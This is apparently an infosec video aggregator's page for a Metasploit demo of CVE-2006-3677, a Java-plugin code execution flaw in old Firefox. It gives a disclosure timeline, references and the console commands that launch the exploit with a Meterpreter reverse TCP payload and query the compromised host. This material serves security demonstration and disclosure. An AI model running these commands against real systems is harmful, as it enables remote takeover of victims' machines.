Description: Timeline :
Vulnerability reported to ZDI by Anonymous
Vulnerability reported to the vendor by ZDI the 2006-06-16
Coordinated vulnerability disclosure the 2006-07-26
PoC provided by hdm the 2006-07-27
Metasploit PoC provided the 2006-07-30
PoC provided by:
hdm
Reference(s) :
CVE-2006-3677
MFSA 2006-45
ZDI-06-025
Affected versions :
Version previous Firefox 1.5.0.5
Tested on Windows XP SP3 with Firefox 1.5.0.4
Description :
This module exploits a code execution vulnerability in the Mozilla Suite, Mozilla Firefox, and Mozilla Thunderbird applications. This exploit requires the Java plugin to be installed.
Metasploit demo :
use exploit/multi/browser/mozilla_navigatorjava
set SRVHOST 192.168.178.21
set TARGET 0
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit
sessions -i 1
sysinfo
getuid
ipconfig
Tags: metasploit , firefox , windows , microsoft , hack ,
Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying.